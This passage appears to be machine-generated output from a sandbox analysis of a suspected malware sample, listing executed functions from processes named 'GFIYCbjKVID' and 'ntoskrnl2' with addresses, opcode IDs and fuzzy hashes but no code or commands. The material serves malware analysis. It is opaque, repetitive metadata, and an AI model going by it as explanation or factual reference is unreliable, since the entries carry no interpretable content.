                                                                              • Instruction Fuzzy Hash: 21C02B30D1E82B48E721332E24870BCA1009FD83D0FD41132D90CC04C2FE4D2CC5069E
                                                                              Function 00007FF848F10728 Relevance: .0, Instructions: 8COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000023.00000002.3013947356.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_35_2_7ff848f10000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e78ea6b3030d760a74df1bc8464bf9cd0e5a2ec463c3bc26d52070dedf33905e
                                                                              • Instruction ID: abee76a647a3d789984fa825bd186ba8f50032fad54e02c53036e5dd355cbc5f
                                                                              • Opcode Fuzzy Hash: e78ea6b3030d760a74df1bc8464bf9cd0e5a2ec463c3bc26d52070dedf33905e
                                                                              • Instruction Fuzzy Hash: 9DB01210C6E80E04D7143376188706474005B88380FC41270D408800C3E98D18D40356
                                                                              Function 00007FF848F25DBF Relevance: .0, Instructions: 6COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000023.00000002.3013947356.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_35_2_7ff848f20000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 99c0cbb2557376d49d0aacbb3acc4d5c1c94a18e875f18da931712d202945757
                                                                              • Instruction ID: 49e7fe28c337f353d2f19ed587a76643dd389aec18bd94091c6b8c69e09831e0
                                                                              • Opcode Fuzzy Hash: 99c0cbb2557376d49d0aacbb3acc4d5c1c94a18e875f18da931712d202945757
                                                                              • Instruction Fuzzy Hash: C9B09230D0C15A8FE780AA4080003AA21026B48380F208431982E432C28FA9AC00969A

                                                                              Executed Functions

                                                                              Function 00007FF8492F5C28 Relevance: 3.9, Strings: 3, Instructions: 156COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $X?,I$X?,I
                                                                              • API String ID: 0-1031711196
                                                                              • Opcode ID: 326555b4a28cfc46c464b9660308120613346a7dc6ed8e6c1f6aaf3ad83c2788
                                                                              • Instruction ID: 9b848f670665615f950bef035384c2336ad3abab81a94396a9865f170f8ac1d6
                                                                              • Opcode Fuzzy Hash: 326555b4a28cfc46c464b9660308120613346a7dc6ed8e6c1f6aaf3ad83c2788
                                                                              • Instruction Fuzzy Hash: FF515C31D0D59EDFEB69EF94D4549BDBBB1FF44340F1045BAC01AA728ACA386901CB54
                                                                              Function 00007FF8492F4BBD Relevance: 2.6, Strings: 2, Instructions: 90COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: `>,I$x=,I
                                                                              • API String ID: 0-2318350823
                                                                              • Opcode ID: d1192d331d5939e41afbf7e1501cbd805f860f88c40ed1ca9678fc2f5a528ca0
                                                                              • Instruction ID: ed02f60d4f6a9041b2c5259578af3b67b350159dde931f587db3c8e2906f02e4
                                                                              • Opcode Fuzzy Hash: d1192d331d5939e41afbf7e1501cbd805f860f88c40ed1ca9678fc2f5a528ca0
                                                                              • Instruction Fuzzy Hash: 1A217051D1EECA5FE356EB3848695B27FE0EF12255B0441BBC089C70CBDE4C6809C341
                                                                              Function 00007FF8492F5E9F Relevance: 1.7, Strings: 1, Instructions: 422COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0E,I
                                                                              • API String ID: 0-2433743372
                                                                              • Opcode ID: e054817210bd57b59d37df945be24856597d9b796e10c7ec3ddcf696da81f4eb
                                                                              • Instruction ID: 9ac4dd03cba07d4806c778d655e3aaf26c215e099f09a6507a76a23e2d4e5aa5
                                                                              • Opcode Fuzzy Hash: e054817210bd57b59d37df945be24856597d9b796e10c7ec3ddcf696da81f4eb
                                                                              • Instruction Fuzzy Hash: 4EF1A13091C59A8FEB58DF18C4E06B577A1FF49300F5446BDC85A8B68FCA38E981CB41
                                                                              Function 00007FF8492F0C18 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID: 0-3916222277
                                                                              • Opcode ID: 4e7463abbba813d743006a530ee7e9941a7f81dc36c0bb10789a86fa20176c95
                                                                              • Instruction ID: 18536e0d6ca4024840343f19a2bd06d9526d98d58e1b05ed272d67453179fd0f
                                                                              • Opcode Fuzzy Hash: 4e7463abbba813d743006a530ee7e9941a7f81dc36c0bb10789a86fa20176c95
                                                                              • Instruction Fuzzy Hash: B1516C30D4D65ADFEB69EF98C4A45BDBBB1FF44340F1040BAC11AE728ACA382901CB50
                                                                              Function 00007FF8492F466D Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: p<,I
                                                                              • API String ID: 0-1362883054
                                                                              • Opcode ID: d4aef7b2916019b33fcda4917e37726f74919ad48d715713a5dfd4341d2a7b0d
                                                                              • Instruction ID: b68319a15b3f157791b9853bb3cf0abbf050504a6bbae425499da4e274a4b9b8
                                                                              • Opcode Fuzzy Hash: d4aef7b2916019b33fcda4917e37726f74919ad48d715713a5dfd4341d2a7b0d
                                                                              • Instruction Fuzzy Hash: BB312F31B0CD1A8FE758EB5CD4559A8B3A2FF89354B10467AD01EC3686DF64B852CB84
                                                                              Function 00007FF8492F45A9 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: B,I
                                                                              • API String ID: 0-1852885570
                                                                              • Opcode ID: a98bbbc7fa007f5ab666136782ee2c2ac2b0c43fca804edb93721193105d7bf0
                                                                              • Instruction ID: d18925e88e89ff0cbb57c847b39671b3e9d5a88e0835a69e78397332e6c42b19
                                                                              • Opcode Fuzzy Hash: a98bbbc7fa007f5ab666136782ee2c2ac2b0c43fca804edb93721193105d7bf0
                                                                              • Instruction Fuzzy Hash: C0113432E0DEEA8FF334EA64481D6BA3BE1EB56781F04057AD009D71CADE9C2C058390
                                                                              Function 00007FF848F217A2 Relevance: .5, Instructions: 459COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2182313984.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff848f20000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f81bf634ce913d0b7779f55c55edc10689753d026db84400dc4a749df3fd5b8d
                                                                              • Instruction ID: 33df843c160a66bd07495895924f1933bc87ce2509bc0e9d6c0c6108860c93ed
                                                                              • Opcode Fuzzy Hash: f81bf634ce913d0b7779f55c55edc10689753d026db84400dc4a749df3fd5b8d
                                                                              • Instruction Fuzzy Hash: E8E1F632D0E6D65FE352A7ACA8691EA7FE0FF52354F0801FBC0888B1D3DE1968458759
                                                                              Function 00007FF8492F0E8F Relevance: .4, Instructions: 445COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 80693274e6046fb73240eb4618abe7cf4ff984fe3c5cf54222734c7f4f4f4429
                                                                              • Instruction ID: 1b5d3f1a148c08a729297636818c9bc0a20558369284e4ab7c65198526c99f5f
                                                                              • Opcode Fuzzy Hash: 80693274e6046fb73240eb4618abe7cf4ff984fe3c5cf54222734c7f4f4f4429
                                                                              • Instruction Fuzzy Hash: 36F1B13091C6A6CFEB59DF18C4E0AB577A1FF45300F9445BDC85A8B68FCA38A881CB41
                                                                              Function 00007FF8492F1ED1 Relevance: .4, Instructions: 411COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 80927cf67aa7193bc27556b2157b034339b74083fee5b3a384757c88f09a7512
                                                                              • Instruction ID: 13ea171be993fe1b4629777fffe563af297a9c2b3c2e6dea8abb2d380964b6dc
                                                                              • Opcode Fuzzy Hash: 80927cf67aa7193bc27556b2157b034339b74083fee5b3a384757c88f09a7512
                                                                              • Instruction Fuzzy Hash: D4E1FF31A0DB968FF778EF289490575B7A1FF56380B10057EC0AAC368EDA29B842D741
                                                                              Function 00007FF8492F6EE1 Relevance: .4, Instructions: 403COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6e8e554d1f9269e43a06d92455332437f9af970e056d76bcacfdf924cfaf592c
                                                                              • Instruction ID: da05cd94656cf8afc5badc219d891f2b05cfb689757fafb652d0f881b1efc382
                                                                              • Opcode Fuzzy Hash: 6e8e554d1f9269e43a06d92455332437f9af970e056d76bcacfdf924cfaf592c
                                                                              • Instruction Fuzzy Hash: 22D1EF30A1DB968FF778EF28D491575B7E1FF84340B10097ED0AAC368EDA29B8469741
                                                                              Function 00007FF8492F5EBF Relevance: .3, Instructions: 333COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d5c718e09efc5cfe7fc0b580841d6e7f5c34128dfa6dabfc748cc6a8a211f416
                                                                              • Instruction ID: f6ce2d8d1cc43f7532e86b1347fbc0e837497eba49f3817d85ede84376fc313e
                                                                              • Opcode Fuzzy Hash: d5c718e09efc5cfe7fc0b580841d6e7f5c34128dfa6dabfc748cc6a8a211f416
                                                                              • Instruction Fuzzy Hash: 91C1AF3051D5A6CFEB19DF08C4A05B537A1FF49350B5446BDC86B8B68FCA38E981CB45
                                                                              Function 00007FF8492F0EAF Relevance: .3, Instructions: 330COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7ea2ffffb0ece0ecfb5939c93d3199224717e72361427112572688d6473beb93
                                                                              • Instruction ID: b6dd0c2c3603e84cbc54060622e2e8747a69865b69b83bfcbd879529fcf2e2f2
                                                                              • Opcode Fuzzy Hash: 7ea2ffffb0ece0ecfb5939c93d3199224717e72361427112572688d6473beb93
                                                                              • Instruction Fuzzy Hash: 4AC18C3091D5A6CFEB29DF48C0A09B537A1FF45344B9446BDD85A8B68FCA38F841DB81
                                                                              Function 00007FF8492F0742 Relevance: .3, Instructions: 321COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 240f30dc3dc9826c3c412b25abc757f4d7a86a6408bd97e87262d8afbee8125a
                                                                              • Instruction ID: b7ea3de726a1be15182e3b12d1aa4d9e7b88eea92448c8bf9f9ca8195d758aeb
                                                                              • Opcode Fuzzy Hash: 240f30dc3dc9826c3c412b25abc757f4d7a86a6408bd97e87262d8afbee8125a
                                                                              • Instruction Fuzzy Hash: 0CC1C030A4CA969FF759EF28C0906A4B7A1FF49340F544179C25EC7A8EDB28B851CB90
                                                                              Function 00007FF8492F3117 Relevance: .3, Instructions: 310COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f3a0028ff01aeefbcfe1f5f77a86ef638f10076cb158d9e3a6b976507f04a627
                                                                              • Instruction ID: 6188cf348fd4fe125834ebaf708b88273af171ebee0da762dd11e50f6f75c85b
                                                                              • Opcode Fuzzy Hash: f3a0028ff01aeefbcfe1f5f77a86ef638f10076cb158d9e3a6b976507f04a627
                                                                              • Instruction Fuzzy Hash: 2231E512D0D1F7DEF375BE6468551BA6650AF413E4F2806BAC46D8A1CFCE0C688963D2
                                                                              Function 00007FF848F20A19 Relevance: .3, Instructions: 283COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2182313984.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff848f20000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0e5f33c8698e5046ebd067a742f69bb1e3b864ab73bd7977091761fd05cf8876
                                                                              • Instruction ID: 76be3ef2e171e2496ce00ec6b07373cb784e0cf483d7928a203544d65641e415
                                                                              • Opcode Fuzzy Hash: 0e5f33c8698e5046ebd067a742f69bb1e3b864ab73bd7977091761fd05cf8876
                                                                              • Instruction Fuzzy Hash: 91713622A1DA490FE369773C68552B576C2EBCA790F24027DD8CFC32C3EE2D68074249
                                                                              Function 00007FF8492F4C86 Relevance: .3, Instructions: 255COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: be3496b5d4563b02eb7237ae53323d15b3278c8047ebf49a89a4cd068ccb52d8
                                                                              • Instruction ID: 52f7385a4d77adda5e8fff62387ee13ddc0347e110e9e552b346ad6b762feb66
                                                                              • Opcode Fuzzy Hash: be3496b5d4563b02eb7237ae53323d15b3278c8047ebf49a89a4cd068ccb52d8
                                                                              • Instruction Fuzzy Hash: 73813531A0DE968FF378EF28A449175B7E1EF85390F14057ED09EC368EDA68B8029741
                                                                              Function 00007FF8492F2DC9 Relevance: .2, Instructions: 239COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: aa200e14f84903655bb34cfa9cbbc03134df5d3c4467e1b453b4ad6df957dd7c
                                                                              • Instruction ID: cb93577b402b1916fbce79d5af98d1205d1d9d6c9a21ad01c1e707aa67adbad9
                                                                              • Opcode Fuzzy Hash: aa200e14f84903655bb34cfa9cbbc03134df5d3c4467e1b453b4ad6df957dd7c
                                                                              • Instruction Fuzzy Hash: FA71653191C59ACFF778FE1898465B437C0FF4A350B2002B9D0AEC769EDE28B8069781
                                                                              Function 00007FF848F21A0D Relevance: .2, Instructions: 221COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2182313984.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff848f20000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: decda270b0b8f07ca12f569f0ec2254b3b7fef5c9e2f1d3a57ab85bad07baf4b
                                                                              • Instruction ID: 39a28f5fe0ef730caea0351a29a661fde91bc19993d4280d36ac97b82a09e720
                                                                              • Opcode Fuzzy Hash: decda270b0b8f07ca12f569f0ec2254b3b7fef5c9e2f1d3a57ab85bad07baf4b
                                                                              • Instruction Fuzzy Hash: 9971C472D0D69A9FE745EBA8A4592EA7FF0FF11354F0801BAC048CB1D3DE2928458759
                                                                              Function 00007FF8492F398B Relevance: .2, Instructions: 220COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1926e7d5ea1c86f5cbab08bdaf1cc6d91f15c6d3f57db0e1afdab4a5985493f8
                                                                              • Instruction ID: 84296a7a4a5de2e184a2a7cb12fecee48e705ed1f28897b88b6f4c03192fc77e
                                                                              • Opcode Fuzzy Hash: 1926e7d5ea1c86f5cbab08bdaf1cc6d91f15c6d3f57db0e1afdab4a5985493f8
                                                                              • Instruction Fuzzy Hash: 7E71B231D1D69ADEFB65EF6488546BEBBA0FF043C0F1005BAD01ED318AEE296841E711
                                                                              Function 00007FF8492F58AE Relevance: .2, Instructions: 205COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a65a977df6c4a4454bcc53a4aaca84da24f93cb1110c30af2e3bb133b2aaa9bc
                                                                              • Instruction ID: dd5508e2e86a07466e7a514f63949551a41f11667bf1a73ae806a0aa07ce1a7f
                                                                              • Opcode Fuzzy Hash: a65a977df6c4a4454bcc53a4aaca84da24f93cb1110c30af2e3bb133b2aaa9bc
                                                                              • Instruction Fuzzy Hash: 9171023050DA87CFE799EF28D0909B0BBA0FF05350F5445BAC45AC7A8BCB28B861C795
                                                                              Function 00007FF848F2083D Relevance: .2, Instructions: 190COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2182313984.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff848f20000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b44780f3c97e8aa4ee50aa15ccfbe258c153ea20bbcfd0f519ad101e0647b4a1
                                                                              • Instruction ID: 2a430a4e44173ba79ea0e2dc7c554abc52475c4c9bdab767c1a7f995f46d2c2b
                                                                              • Opcode Fuzzy Hash: b44780f3c97e8aa4ee50aa15ccfbe258c153ea20bbcfd0f519ad101e0647b4a1
                                                                              • Instruction Fuzzy Hash: FF513732E1DA588FE754FB3C94492BA7BE1FF88355F15017AE44AC72A2DF2898018741
                                                                              Function 00007FF8492F7507 Relevance: .1, Instructions: 127COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d94f324f5f2a975adf4e54d825952723d887de8146dc5b14047f9059a7b15f06
                                                                              • Instruction ID: f9440cbcf9d6144d40048cd57c36433f533840dea5b78ea699ac4d4ea987a534
                                                                              • Opcode Fuzzy Hash: d94f324f5f2a975adf4e54d825952723d887de8146dc5b14047f9059a7b15f06
                                                                              • Instruction Fuzzy Hash: 66419531A0C959CFDF58EF28C495EA5B3E1FBA9320B1406AAD14EC3196DF24EC45CB81
                                                                              Function 00007FF8492F24F7 Relevance: .1, Instructions: 127COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e4f8979d1094ce8992731f1099d70c0a8e50ceece4e8e42022c37bee6d24b185
                                                                              • Instruction ID: a48cab66d6d50687c1ad028b00ab9d03d1010dbf128cf1d848c74a6911e93858
                                                                              • Opcode Fuzzy Hash: e4f8979d1094ce8992731f1099d70c0a8e50ceece4e8e42022c37bee6d24b185
                                                                              • Instruction Fuzzy Hash: EE419331A0C9598FDF98EF18D465AA573E1FBA9320B0405AAD10EC7296CF25EC45CB81
                                                                              Function 00007FF848F21C45 Relevance: .1, Instructions: 124COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2182313984.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff848f20000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c770e83da388ddb3ad337ea61084f425716dfbebcb85aac6d22433240bb52170
                                                                              • Instruction ID: 113f47681f00dbabb7dabe84ff016635a52d1e7d1ed0d6b3eb1c9e3a00d53dbb
                                                                              • Opcode Fuzzy Hash: c770e83da388ddb3ad337ea61084f425716dfbebcb85aac6d22433240bb52170
                                                                              • Instruction Fuzzy Hash: 8E418C71A09A8A9FE389DF68E4583E97EE0EB65344F50017EC009D73E2DFBD24498745
                                                                              Function 00007FF8492F75B1 Relevance: .1, Instructions: 120COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 497ad5159431324d340cecb7e626ce0f5ff3b4f49df5ff045496a9ff2f2b1436
                                                                              • Instruction ID: 598456440a38f9fda44e5a57159f86dee67a3a9c78edf9c458d41ceaf3e29f2c
                                                                              • Opcode Fuzzy Hash: 497ad5159431324d340cecb7e626ce0f5ff3b4f49df5ff045496a9ff2f2b1436
                                                                              • Instruction Fuzzy Hash: 12318431A0C9558FDF59EF28C0A5EA473E2FFA9714B1406ADD14AC7192CF24EC85CB82
                                                                              Function 00007FF8492F25A1 Relevance: .1, Instructions: 120COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4328eea4ef00a68e1898ddad446c16652b2fc334884ad5605eb13c79d1b80938
                                                                              • Instruction ID: 7881bf58a077e857a41e0787014d690b4e0921443f86d27932ba4dfbb993fdd4
                                                                              • Opcode Fuzzy Hash: 4328eea4ef00a68e1898ddad446c16652b2fc334884ad5605eb13c79d1b80938
                                                                              • Instruction Fuzzy Hash: 18319031A0C9558FDB9CEF28C465AA573E1FFA9710B0406EAD10AC7296CE24EC45CB91
                                                                              Function 00007FF8492F754B Relevance: .1, Instructions: 115COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2fb6e6ec2368722d6b436b0a9dcedd522c228afe9cc3f3fddea04859e38efbeb
                                                                              • Instruction ID: 0e892e191187873eabcf7c092ccd736064bbca0bd74043c3526a0c10dd77a93b
                                                                              • Opcode Fuzzy Hash: 2fb6e6ec2368722d6b436b0a9dcedd522c228afe9cc3f3fddea04859e38efbeb
                                                                              • Instruction Fuzzy Hash: 02316431A0C959CFDF58EF28C0A5EA573E2FBA9710B1406A9D14AC7196DF24EC85CB81
                                                                              Function 00007FF8492F253B Relevance: .1, Instructions: 115COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
